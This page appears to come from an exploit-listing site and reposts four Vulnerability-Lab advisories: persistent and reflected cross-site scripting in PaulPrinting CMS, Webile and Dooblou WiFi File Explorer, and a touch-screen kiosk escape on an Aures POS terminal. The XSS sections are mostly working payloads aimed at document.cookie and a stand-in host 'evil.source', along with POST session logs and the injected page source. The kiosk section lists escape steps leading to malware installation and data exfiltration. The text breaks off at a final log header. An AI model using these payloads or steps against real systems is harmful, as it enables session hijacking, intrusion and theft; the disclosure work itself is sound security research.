Latest exploits :: CodePwn

<pre><code>Document Title: =============== PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2285 Release Date: ============= 2023-07-19 Vulnerability Laboratory ID (VL-ID): ==================================== 2285 Common Vulnerability Scoring System: ==================================== 5.8 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== PaulPrinting is designed feature rich, easy to use, search engine friendly, modern design and with a visually appealing interface. (Copy of the Homepage:https://codecanyon.net/user/codepaul ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple persistent cross site vulnerabilities in the PaulPrinting (v2018) cms web-application. Affected Product(s): ==================== CodePaul Product: PaulPrinting (2018) - CMS (Web-Application) Vulnerability Disclosure Timeline: ================================== 2022-08-25: Researcher Notification & Coordination (Security Researcher) 2022-08-26: Vendor Notification (Security Department) 2022-**-**: Vendor Response/Feedback (Security Department) 2022-**-**: Vendor Fix/Patch (Service Developer Team) 2022-**-**: Security Acknowledgements (Security Department) 2023-07-19: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (User Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ Multiple persistent input validation vulnerabilities has been discovered in the official PaulPrinting (v2018) cms web-application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The first vulnerability is located in the register module. Remote attackers are able to register user account with malicious script code. After the registration to attacker provokes an execution of the malformed scripts on review of the settings or by user reviews of admins in the backend (listing). The second vulnerability is located in the delivery module. Remote attackers with low privileged user accounts are able to inject own malicious script code to contact details. Thus allows to perform an execute on each interaction with users or by reviews of admins in the backend (listing). Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] /printing/register [+] /account/delivery Vulnerable Input(s): [+] First name [+] Last name [+] Address [+] City [+] State Vulnerable Parameter(s): [+] firstname [+] lastname [+] address [+] city [+] state Affected Module(s): [+] Frontend Settings (./printing/account/setting) [+] Frontend Delivery Address (./printing/account/delivery) [+] Backend User Preview Listing [+] Backend Delivery Address Contact Review Proof of Concept (PoC): ======================= The persistent input validation web vulnerabilities can be exploited by remote attackers with low privileged user account and low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Open your browser and start a http session tamper 2. Register in the application by login click to register 3. Inject to the marked vulnerable input fields your test payload 4. Save the entry by submit via post method 5. Login to the account and preview the settings Note: Administrators in the backend have the same wrong validated context that executes on preview of users 6. The script code executes on preview of the profile - settings 7. Successful reproduce of the first vulnerability! 8. Followup by opening the Delivery address module 9. Add a contact and add in the same vulnerable marked input fields your test payload Note: T he script code executes on each review of the address in the backend or user frontend 10. Successful reproduce of the second vulnerability! Exploitation: Payload "<iframe src=evil.source onload(alert(document.cookie)> "<iframe src=evil.source onload(alert(document.domain)> --- PoC Session Logs (POST) --- https://paulprinting.localhost:8000/printing/account/setting Host: paulprinting.localhost:8000 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded Content-Length: 357 Origin:https://paulprinting.localhost:8000 Connection: keep-alive Referer:https://paulprinting.localhost:8000/printing/account/setting Cookie: member_login=1; member_id=123; session_id=13446428fe6e202a3be0e0ce23f0e5cd; POST: title=Mr.&firstname=a"<iframe src=evil.source onload(alert(document.cookie)>> &lastname=b"<iframe src=evil.source onload(alert(document.cookie)>> &address=c"<iframe src=evil.source onload(alert(document.cookie)>> &city=d"<iframe src=evil.source onload(alert(document.cookie)>> &state=e"<iframe src=evil.source onload(alert(document.cookie)>> &zipcode=2342&country=BS&phone=23523515235235&save=Save - POST: HTTP/3.0 302 Found content-type: text/html; charset=UTF-8 x-powered-by: PHP/7.1.33 location:https://paulprinting.localhost:8000/printing/account/setting?save=1 - https://paulprinting.localhost:8000/printing/account/setting?save=1 Host: paulprinting.localhost:8000 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Referer:https://paulprinting.localhost:8000/printing/account/setting Connection: keep-alive Cookie: member_login=1; member_id=123; session_id=13446428fe6e202a3be0e0ce23f0e5cd; - POST: HTTP/3.0 200 OK content-type: text/html; charset=UTF-8 x-powered-by: PHP/7.1.33 Vulnerable Source: Your Account - Settings <div class="form-group row"> <label class="col-sm-4 col-form-label">First name</label> <div class="col-sm-8"> <input type="text" name="firsttname" class="form-control" value="a"<iframe src=evil.source onload(alert(document.cookie)>"> </div></div> <label class="col-sm-4 col-form-label">Last name</label> <div class="col-sm-8"> <input type="text" name="lastname" class="form-control" value="b"<iframe src=evil.source onload(alert(document.cookie)>"> </div></div> <div class="form-group row"> <label class="col-sm-4 col-form-label">Address</label> <div class="col-sm-8"> <input type="text" name="address" class="form-control" value="c"<iframe src=evil.source onload(alert(document.cookie)>"> </div></div> <div class="form-group row"> <label class="col-sm-4 col-form-label">City</label> <div class="col-sm-8"> <input type="text" name="city" class="form-control" value="d"<iframe src=evil.source onload(alert(document.cookie)>"> </div></div> <div class="form-group row"> <label class="col-sm-4 col-form-label">State</label> <div class="col-sm-8"> <input type="text" name="state" class="form-control" value="e"<iframe src=evil.source onload(alert(document.cookie)>"> </div></div> Vulnerable Source: Deliery Contact (Address) <table class="table"> <thead> <tr> <th>Contact</th> <th>Address</th> <th>City</th> <th>State</th> <th>Country</th> <th></th> </tr> </thead> <tbody><tr> <td>a"<iframe src=evil.source onload(alert(document.cookie)></td> <td>b"<iframe src=evil.source onload(alert(document.cookie)></td> <td>c"<iframe src=evil.source onload(alert(document.cookie)></td> <td>d"<iframe src=evil.source onload(alert(document.cookie)></td> <td></td> <td class="text-right"> <a href="https://paulprinting.localhost:8000/printing/account/delivery?id=10">Edit</a>| <a href="https://paulprinting.localhost:8000/printing/account/delivery?id=10&delete=1" onclick="return confirm('Delete')">Delete</a> </td></tr></tbody> </table> Security Risk: ============== The security risk of the cross site scripting web vulnerabilities with persistent attack vector are estimated as medium. Credits & Authors: ================== Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY (VULNERABILITY LAB) RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE </code></pre>

<pre><code>Document Title: =============== Aures Booking & POS Terminal - Local Privilege Escalation References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2323 Release Date: ============= 2023-07-17 Vulnerability Laboratory ID (VL-ID): ==================================== 2323 Common Vulnerability Scoring System: ==================================== 7.2 Vulnerability Class: ==================== Privilege Escalation Current Estimated Price: ======================== 3.000€ - 4.000€ Product & Service Introduction: =============================== KOMET is an interactive, multifunctional kiosk and specially designed for the fast food industry. Available as a wall-mounted or freestanding model, its design is especially adapted to foodservice such as take-aways or fast food in system catering. The kiosk features a 27 YUNO touch system in portrait mode, an ODP 444 thermal receipt printer, a payment terminal and a 2D barcode scanner. With a click, the customer selects, books, orders, purchases and pays directly at the kiosk. The system offers the possibility to manage customer cards and promotions. Queue management can also be optimized. (Copy of the Homepage:https://aures.com/de/komet/ ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a local kiosk privilege escalation vulnerability in the operating system of the Aures Komet Booking & POS Terminal (Windows 10 IoT Enterprise) used by the german company immergrün franchise gmbh. Affected Product(s): ==================== Aures Technologies GmbH Product: Aures Komet Booking & POS Terminal - (KIOSK) (Windows 10 IoT Enterprise) Vulnerability Disclosure Timeline: ================================== 2023-05-09: Researcher Notification & Coordination (Security Researcher) 2023-07-17: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Local Severity Level: =============== High Authentication Type: ==================== Open Authentication (Anonymous Privileges) User Interaction: ================= No User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ A kiosk mode escalation vulnerability has been discovered in the operating system of the Aures Komet Booking & POS Terminal (Windows 10 IoT Enterprise) used by the german company immergrün franchise gmbh. The security vulnerability allows local attackers to bypass the kiosk mode to compromise the local file system and applications. It is possible for local attackers to escalate out of the kiosk mode in the aures komet booking & pos terminal. Local attackers are able to use the touch functionalities in the aures komet booking & pos terminal system to escalate with higher privileges. The security vulnerability is located in the context menu function of the extended menu on touch interaction. Attackers with restricted low local privileged access to the booking service front display are able to execute files, can unrestricted download contents or exfiltrate local file-system information of the compromised windows based operating system. No keyboard or connections are required to manipulate the service booking and payment terminal. The booking and payment terminal system vulnerability requires no user user interaction to become exploited and can only be triggered by local physical device access. Vulnerable Operating System(s): [+] Windows 10 (IoT Enterprise) Affected Component(s): [+] Context Menu Affected Function(s): [+] Web Search [+] Share (Teilen) Proof of Concept (PoC): ======================= The local vulnerability can be exploited by local attackers with physical device access without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: Sheet Touch Display => Select Food Item => Highlight Text => Open Context Menu => Extend Context Menu => Web-Search => Browser => Local File System => Compromised! Manual steps to reproduce the vulnerability ... 01. First touch the monitor display to move on from standby 02. Select an food item from the menu of immergrün (we recomment the cesar wraps) 03. Push the information button of the selected food item 04. Push twice via touch to mark the selected food item text 05. Press a third time after you have marked the context by holding it down on the touch display 06. Now the function context menu of the operating system for highlighted text appears 07. On the context menu appearing 3 dots to extend the visible function menu 08. Select the web-search or share function for the highlighted content in the context menu 09. The browser of the operating system opens on the main front screen 10.1 By now you are able to download an execute executables using the browser without any blacklisting (Unrestricted Web Access - Download of Files) 10.2 Attackers can open websites on the fron display to manipulate the visible content (Scam & Spam - Web Messages & Web Context) 10.3 Attackers are able to manipulate via browser debugger the web content displayed from immergrün (Phishing - Formular & Banking Information) 10.4 Attackers are able to access the local file system and compromise it by reconfiguration with privileged user account (Local File-System - Privilege Escaltion) 10.5 Attackers are able to infect the local operating system with ransomware or other malicious programs and scripts (Malware - Ransomware, Keylogger, Trojan-Banking & Co.) 10.6 Attackers are able to exfiltrate data from the local computer system using web connecting and available protocols 10.7 Attackers are able to perform man in the middle attacks from the local computer system 11.0 Successful reproduce of the security vulnerability! Reference(s): Pictures - 1.png (Terminal A) - 2.png (Terminal B) - 3.png (Escape) - 4.png (Awareness) Solution - Fix & Patch: ======================= The security vulnerabilities can be patched by following steps: 1. Disable the content menu to extend 2. Disable the context menu 3. Disable web-search 4. Disable to mark text inputs & texts 5. Disallow to open not white listed websites 6. Disable to download files 7. Restrict the web-browser access 8. Disallow the file browser 9. Disable the browser debug modus 10. Reconfigure the local firewall to allow and disallow connections 11. Change the access permission to prevent exfiltration Security Risk: ============== The security risk of the vulnerability in the local booking and payment terminal system is considered high. The issue can be easily exploited by local attackers with simple interaction via the touch display. Once compromised, the attackers can fully manipulate the computer's operating system and use it misuse it for further simple or more complex attack scenarios. Credits & Authors: ================== Benjamin Mejri (Kunz) -https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. Lars Guenther -https://www.vulnerability-lab.com/show.php?user=L.+Guenther Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: https://www.vulnerability-lab.com ; https://www.vuln-lab.com ;https://www.vulnerability-db.com Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY (VULNERABILITY LAB) RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE </code></pre>

<pre><code>Document Title: =============== Webile v1.0.1 - Multiple Cross Site Web Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2321 Release Date: ============= 2023-07-03 Vulnerability Laboratory ID (VL-ID): ==================================== 2321 Common Vulnerability Scoring System: ==================================== 5.5 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== Webile, is a local area network cross-platform file management tool based on http protocol. Using the personal mobile phone as a server in the local area network, browsing mobile phone files, uploading files, downloading files, playing videos, browsing pictures, transmitting data, statistics files, displaying performance, etc. No need to connect to the Internet, you can browse files, send data, play videos and other functions through WiFi LAN or mobile phone hotspot, and no additional data traffic will be generated during data transmission. Support Mac, Windows, Linux, iOS, Android and other multi-platform operating systems. (Copy of the Homepage:https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple persistent web vulnerabilities in the Webile v1.0.1 Wifi mobile android web application. Affected Product(s): ==================== Product Owner: Webile Product: Webile v1.0.1 - (Framework) (Mobile Web-Application) Vulnerability Disclosure Timeline: ================================== 2022-10-11: Researcher Notification & Coordination (Security Researcher) 2022-10-12: Vendor Notification (Security Department) 2022-**-**: Vendor Response/Feedback (Security Department) 2022-**-**: Vendor Fix/Patch (Service Developer Team) 2022-**-**: Security Acknowledgements (Security Department) 2023-07-03: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (Guest Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ Multiple persistent input validation web vulnerabilities has been discoveredin the Webile v1.0.1 Wifi mobile android web application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The persistent input validation web vulnerabilities are located in the send and add function. Remote attackers are able to inject own malicious script codes to the new_file_name and i parameter post method request to provoke a persistent execution of the malformed content. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Parameter(s): [+] new_file_name [+] i Proof of Concept (PoC): ======================= The persistent input validation web vulnerabilities can be exploited by remote attackers without user account and with low user interaction. For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue. Vulnerable Source: Send Send message to phone listing <div class="layui-colla-item"> <div class="layui-card-header">Message</div> <div class="layui-colla-content" style="display:block;padding-left:16px;"> <div class="layui-form-item layui-form-text" id="showMsg"><div>20:10:11<a href="javascript:;" title="Copy" onclick="copy(1658081411827)">&nbsp;&nbsp;</a> test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg> </div> </div></div></div> history logs messages <table class="layui-table layui-form"> <thead><tr> <th style="text-align: center;vertical-align: middle!important;border-left-width:1px;border-right-width:1px;height:32px;" width="2%" align="center"> <input type="checkbox" lay-filter="checkall" name="" lay-skin="primary"><div class="layui-unselect layui-form-checkbox" lay-skin="primary"></div></th> <th style="border-right-width:1px;">Message</th> <th style="text-align: center;vertical-align: middle!important;border-right-width:1px;" width="15%">Date</th> <th style="text-align: center;vertical-align: middle!important;border-right-width:1px;" width="3%" valign="center">Action</th></tr> </thead> <tbody><tr> <td style="text-align: center;vertical-align: middle!important;border-left-width:1px;min-height:180px;" align="center"> <input type="checkbox" name="id" value="3" lay-skin="primary"><div class="layui-unselect layui-form-checkbox" lay-skin="primary"></div> </td> <td style="height:32px;"> test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg></td> <td align="center">2022/07/17 20:10</td> <td class="td-manage" style="border-right-width:1px;text-align:center;"> <a title="Copy" onclick="copy(3)" href="javascript:;"> &nbsp;&nbsp; </a> <a title="Delete" onclick="deleteLog(this,3)" href="javascript:;"> &nbsp;&nbsp; </a></td></tr></tbody></table> --- PoC Session Logs #1 (POST) --- (Add) http://localhost:8080/file_action Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 210 Origin:http://localhost:8080 Connection: keep-alive Referer:http://localhost:8080/webile_files Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6 i={"action":"create","file_path":"/storage/emulated/0","new_file_name":"pwnd23>"<iimg src=evil.source onload=alert(document.cookie)></iimg>"} - POST: HTTP/1.1 200 OK Content-Type: application/json Connection: keep-alive Content-Encoding: gzip Transfer-Encoding: chunked - http://localhost:8080/evil.source Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Referer:http://localhost:8080/webile_files Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6 Upgrade-Insecure-Requests: 1 - GET: HTTP/1.1 200 OK Content-Type: application/octet-stream Connection: keep-alive Content-Length: 0 - Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6 --- PoC Session Logs #2 (POST) --- (Send) http://localhost:8080/send Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 180 Origin:http://localhost:8080 Connection: keep-alive Referer:http://localhost:8080/webile_send Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6 i={"os":"Windows Windows 10","b":"firefox 102.0","c":">"<iimg src=evil.source onload=alert(document.cookie)></iimg>"} - POST: HTTP/1.1 200 OK Content-Type: application/json Connection: keep-alive Content-Encoding: gzip Transfer-Encoding: chunked - http://localhost:8080/evil.source Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Referer:http://localhost:8080/webile_send Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6 Upgrade-Insecure-Requests: 1 - GET: HTTP/1.1 200 OK Content-Type: application/octet-stream Date: Sun, 17 Jul 2022 18:08:33 GMT Connection: keep-alive Content-Length: 0 Security Risk: ============== The security risk of the persistent web vulnerabilities in the mobile web application is estimated as medium. Credits & Authors: ================== Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: https://www.vulnerability-lab.com ; https://www.vuln-lab.com ;https://www.vulnerability-db.com Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY (VULNERABILITY LAB) RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE </code></pre>

<pre><code>Document Title: =============== Dooblou WiFi File Explorer 1.13.3 - Multiple Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2317 Release Date: ============= 2023-07-04 Vulnerability Laboratory ID (VL-ID): ==================================== 2317 Common Vulnerability Scoring System: ==================================== 5.1 Vulnerability Class: ==================== Multiple Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== Browse, download and stream individual files that are on your Android device, using a web browser via a WiFi connection. No more taking your phone apart to get the SD card out or grabbing your cable to access your camera pictures and copy across your favourite MP3s. (Copy of the Homepage:https://play.google.com/store/apps/details?id=com.dooblou.WiFiFileExplorer ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple web vulnerabilities in the official Dooblou WiFi File Explorer 1.13.3 mobile android wifi web-application. Affected Product(s): ==================== Product Owner: dooblou Product: Dooblou WiFi File Explorer v1.13.3 - (Android) (Framework) (Wifi) (Web-Application) Vulnerability Disclosure Timeline: ================================== 2022-01-19: Researcher Notification & Coordination (Security Researcher) 2022-01-20: Vendor Notification (Security Department) 2022-**-**: Vendor Response/Feedback (Security Department) 2022-**-**: Vendor Fix/Patch (Service Developer Team) 2022-**-**: Security Acknowledgements (Security Department) 2023-07-04: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (Guest Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ Multiple input validation web vulnerabilities has been discovered in the official Dooblou WiFi File Explorer 1.13.3 mobile android wifi web-application. The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise browser to web-application requests from the application-side. The vulnerabilities are located in the `search`, `order`, `download`, `mode` parameters. The requested content via get method request is insecure validated and executes malicious script codes. The attack vector is non-persistent and the rquest method to inject is get. Attacker do not need to be authorized to perform an attack to execute malicious script codes. The links can be included as malformed upload for example to provoke an execute bby a view of the front- & backend of the wifi explorer. Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious source and non-persistent manipulation of affected application modules. Proof of Concept (PoC): ======================= The input validation web vulnerabilities can be exploited by remote attackers without user account and with low user interaction. For security demonstration or to reproduce the web vulnerabilities follow the provided information and steps below to continue. PoC: Exploitation http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source" onmouseover=alert(document.domain)> PLEASE CLICK PATH TO RETURN INDEX</a> http://localhost:8000/storage/emulated/0/Download/?mode=31&search=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert%28document.domain%29%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX%3C%2Fa%3E&x=3&y=3 http://localhost:8000/storage/emulated/0/Download/?mode=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX&search=a&x=3&y=3 http://localhost:8000/storage/emulated/?order=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX Vulnerable Sources: Execution Points <table width="100%" cellspacing="0" cellpadding="16" border="0"><tbody><tr><td style="vertical-align:top;"><table style="background-color: #FFA81E; background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png); background-repeat: repeat-x; background-position:top;" width="700" cellspacing="3" cellpadding="5" border="0"><tbody><tr><td><center><span class="doob_large_text">ERROR</center></td></tr></tbody></table> <tabl e style="background-color: #B2B2B2; background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png); background-repeat: repeat-x; background-position:top;" width="700" cellspacing="3" cellpadding="5" border="0"> <tbody><tr><td>Cannot find file or directory! /storage/emulated/0/Download/<a href="https://evil.source" onmouseover="alert(document.domain)"> PLEASE CLICK USER PATH TO RETURN INDEX</a></td></tr></tbody></table> &nbsp;&nbsp;<a href="/">>>&nbsp;Back To Files&nbsp;>></a> </td></tr></tbody></table> - <li></li></ul></td></tr></tbody></table></div><div class="body row scroll-x scroll-y"><table width="100%" cellspacing="0" cellpadding="6" border="0"><tbody><tr> <td style="vertical-align:top;" width="100%"><form name="multiSelect" style="margin: 0px; padding: 0px;" action="/storage/emulated/0/Download/" enctype="multipart/form-data" method="POST"> <input type="hidden" name="fileNames" value=""><table width="100%" cellspacing="0" cellpadding="1" border="0" bgcolor="#000000"><tbody><tr><td> <table width="100%" cellspacing="2" cellpadding="3" border="0" bgcolor="#FFFFFF"><tbody><tr style="background-color: #FFA81E; background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png); background-repeat: repeat-x; background-position:top;" height="30"><td colspan="5"><table width="100%" cellspacing="0" cellpadding="0" border="0"><tbody><tr><td style="white-space: nowrap;vertical-align:middle">&nbsp;</td><td style="white-space: nowrap;vertical-align:middle" align="right"> &nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=23&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"> PLEASE CLICK PATH TO RETURN INDEX&search=a"> <img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_details.png" alt="img" title="Details"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp; <a href="?view=24&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"> PLEASE CLICK PATH TO RETURN INDEX&search=a"> <img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_thumbnails.png" alt="img" title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp; <a href="?view=38&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"> PLEASE CLICK PATH TO RETURN I - <td style="white-space: nowrap;vertical-align:middle"><input value="" type="checkbox" name="selectAll" onclick="setCheckAll();">&nbsp;&nbsp;<a class="doob_button" href="javascript:setMultiSelect('/storage/emulated/', 'action', '18&order=>" <<="">>"<a href="https://evil.source" onmouseover=alert(document.domain)">');javascript:document.multiSelect.submit();" style="">Download</a>&nbsp;<a class="doob_button" href="javascript:setMultiSelectConfirm('Are you sure you want to delete? This cannot be undone!', '/storage/emulated/', 'action', '13&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>');javascript:document.multiSelect.submit();" style="">Delete</a>&nbsp; <a class="doob_button" href='javascript:setMultiSelectPromptQuery("Create Copy", "/storage/emulated/", "/storage/emulated/", "action", "35&order=>"<<<a href="https://evil.source" onmouseover=alert(document.domain)>", "name");javascript:document.multiSelect.submit();' style="">Create Copy</a>&nbsp;<a class="doob_button" href="x99_dooblou_pro_version.html" style="">Zip</a>&nbsp;<a class="doob_button" href="x99_dooblou_pro_version.html" style="">Unzip</a></td> <td align="right" style="white-space: nowrap;vertical-align:middle">&nbsp;&nbsp;&nbsp;&nbsp;<a href="javascript:showTreeview()"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_tree_dark.png" alt="img" title="Show Treeview"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp; <a href="?view=23&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_details.png" alt="img" title="Details"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=24&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_thumbnails.png" alt="img" title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp; <a href="?view=38&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_grid.png" alt="img" title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table> ---PoC Session Logs --- 